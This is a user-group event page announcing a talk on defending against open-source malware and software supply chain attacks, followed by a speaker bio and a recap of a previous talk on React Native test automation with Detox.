|
Malware Security |
| Bryan Whyte, CISSP Directory, Solutions Engineering @ Sonatype |
Wednesday June 17, 2025 6:30-8:00 PM - in person (free pizza!) via Zoom (no pizza...) |
|
|
|
Check in between 6:00 and 6:30 to network |
|
About the Presentation. . . Bryan Whyte breaks down the latest wave of open-source malware, explains how these threats diverge from traditional vulnerabilities, and shares actionable steps for organizations to defend mission-critical software. As organizations deepen their reliance on open-source software, evolving security threats are reshaping the landscape at an unprecedented pace. Threat actors are now increasingly targeting development pipelines and trusted ecosystems like npm to orchestrate supply chain attacks with significant downstream impact. Incidents such as the 2025 Shai-Hulud npm campaign, the XZ Utils backdoor, and the widespread compromise of over 23,000 GitHub repositories illustrate how open-source malware has quickly become a critical, top-tier threat built to evade legacy scanning and exploit trust woven into modern delivery pipelines.
|
|
About the Speaker. . .
After spending 20 years in software development, Bryan started his journey into Application Security in 2015 with the AppScan tool suite for Static, Dynamic and Mobile Application Security Testing. In 2018, he expanded his Cybersecurity proficiency, earning the Certified Information Systems Security Professional (CISSP). In 2019, he was excited to join Sonatype due to the explosive growth of open-source software, which has made Software Composition Analysis (SCA) a critical aspect of Application Security.
|
|
May's Presentation . . See also the recording of Mays’s well-received presentation by T.J. Maher - Building a React Native Mobile Automated Test Framework - in the www.SQGNE.org Calendar. In the past ten years, mobile web traffic has doubled over desktop browser traffic. To improve user experience in the mobile environment, developers create native apps designed and optimized for a particular device type. Not surprisingly, mobile native app testing requires a specialized knowledge base and unique testing requirements, the topic of TJ Maher’s “Building a React Native Mobile Automated Test Framework” presented to SQGNE’s monthly meeting. TJ brought enthusiasm, authoritative knowledge, and 10-years experience as a SDET to the group in an informative, comprehensive overview of the software test life cycle for the mobile app ecosystem: from an overview of React Native mobile apps, test development, and finally, executing tests from the command line and in a CI/CD GitHub Action. Because of the inherent volatility in the mobile environment, tooling that is used to test applications in the desktop/web browser environment is not ideally suited for mobile app testing. In 2016, Wix developed the tool TJ discussed, “Detox”, with which he has developed automation test frameworks for native mobile apps. TJ took us through steps A through Z in constructing an automated test framework, using Detox and TypeScript. Detox, an open source product with two flavors EarlGrey (iOS) and Expresso (Android), creates a special build of the application under test so it can monitor the application under test. This monitoring eliminates the flakiness and resultant test failures due to the tests themselves; the tests run only when the app is ready. All automation engineers will appreciate this benefit after spending too much time addressing the causes of test flakiness and timing issues. TJ’s Detox demo included a test to validate user name and password on a login page. The framework was composed of test code, configuration, and page objects. Other features included logging, pre-test scripts, and reports. TJ’s presentation concluded with running the test in a GitHub CI/CD pipeline as a GitHub Action. |
Grateful thanks to sponsors Microsoft and mabl for making SQGNE possible. Please let us know of any additional prospective sponsors.
Link to SQGNE Community Links Page
May 2025